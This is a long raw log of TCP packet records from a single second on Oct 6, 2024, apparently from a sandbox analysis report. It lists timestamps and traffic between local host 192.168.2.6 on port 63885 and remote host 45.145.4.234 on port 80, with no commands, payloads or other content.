                                                                                                                                                Oct 6, 2024 22:18:48.231081963 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.231112957 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.231163979 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.231197119 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.231210947 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.231230974 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.231240034 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.231266022 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.231277943 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.231300116 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.231307983 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.231333971 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.231343031 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.231368065 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.231375933 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.231408119 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.231426001 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.231460094 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.231471062 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.231492996 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.231502056 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.231525898 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.231535912 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.231559038 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.231568098 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.231592894 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.231600046 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.231626034 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.231633902 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.231658936 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.231667042 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.231688976 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.231699944 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.231722116 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.231730938 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.231762886 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.231772900 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.231806993 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.231816053 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.231841087 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.231851101 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.231878042 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.231884956 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.231913090 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.231920004 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.231946945 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.231955051 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.231981039 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.231988907 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.232012987 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.232023001 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.232053995 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.232064009 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.232095957 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.232106924 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.232135057 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.232146025 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.232177973 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.232193947 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.232211113 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.232223988 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.232244015 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.232256889 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.232280970 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.232290030 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.232315063 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.232328892 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.232348919 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.232362032 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.232383013 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.232394934 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.232417107 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.232429981 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.232450962 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.232462883 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.232485056 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.232496977 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.232518911 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.232530117 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.232553959 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.232567072 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.232587099 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.232599020 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.232620955 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.232633114 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.232654095 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.232671022 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.232687950 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.232697010 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.232718945 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.232722044 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.232752085 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.232783079 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.232784986 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.232795954 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.232829094 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.232844114 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.232877970 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.232887030 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.232913017 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.232919931 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.232947111 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.232955933 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.232988119 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.232996941 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.233032942 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.233050108 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.233076096 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.233087063 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.233128071 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.233140945 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.233169079 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.233179092 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.233212948 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.233222961 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.233246088 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.233258963 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.233278990 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.233289957 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.233311892 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.233325958 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.233344078 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.233371973 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.233378887 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.233388901 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.233412981 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.233431101 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.233447075 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.233454943 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.233479977 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.233488083 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.233520985 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.233527899 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.233561039 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.233570099 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.233594894 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.233602047 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.233633995 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.316071987 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.316109896 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.316164017 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.316199064 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.316248894 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.316270113 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.316282034 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.316313028 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.316317081 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.316328049 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.316350937 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.316365957 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.316404104 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.316457033 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.316505909 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.316539049 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.316548109 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.316571951 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.316580057 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.316606045 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.316613913 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.316649914 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.316657066 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.316690922 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.316703081 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.316725016 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.316734076 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.316759109 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.316766977 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.316792965 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.316798925 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.316827059 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.316859961 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.316875935 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.316893101 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.316907883 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.316926003 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.316951990 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.316960096 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.316966057 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.316999912 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.317011118 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.317044020 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.317063093 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.317076921 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.317096949 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.317110062 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.317116976 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.317143917 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.317174911 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.317188025 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.317208052 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.317213058 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.317243099 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.317269087 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.317325115 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.317359924 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.317368984 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.317394972 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.317404985 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.317429066 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.317435980 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.317470074 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.317482948 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.317512035 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.317524910 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.317543983 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.317552090 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.317576885 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.317588091 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.317610979 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.317617893 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.317646027 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.317650080 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.317678928 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.317687988 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.317713976 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.317718029 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.317747116 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.317754030 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.317783117 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.317785978 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.317815065 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.317821980 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.317847967 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.317856073 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.317882061 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.317893028 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.317928076 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.317935944 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.317967892 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.317974091 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.318002939 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.318006992 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.318037033 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.318042040 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.318070889 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.318077087 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.318103075 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.318109989 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.318136930 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.318144083 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.318169117 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.318175077 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.318203926 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.318209887 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.318236113 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.318242073 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.318269968 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.318274975 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.318304062 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.318320036 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.318336964 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.318348885 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.318375111 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.318391085 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.318424940 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.318433046 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.318458080 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.318464994 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.318490982 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.318497896 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.318523884 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.318533897 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.318557024 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.318561077 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.318591118 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.318598032 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.318624973 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.318630934 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.318658113 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.318664074 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.318691969 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.318697929 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.318725109 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.318732023 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.318764925 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.318779945 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.318808079 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.318820000 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.318840027 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.318845987 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.318875074 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.318882942 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.318906069 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.318914890 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.318939924 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.318943977 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.318973064 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.318979025 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.319008112 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.319014072 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.319041014 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.319048882 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.319073915 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.319082022 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.319106102 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.319113016 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.319140911 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.319147110 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.319174051 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.319199085 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.319209099 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.319214106 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.319255114 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.319262981 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.319294930 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.319308043 CEST6388580192.168.2.645.145.4.234
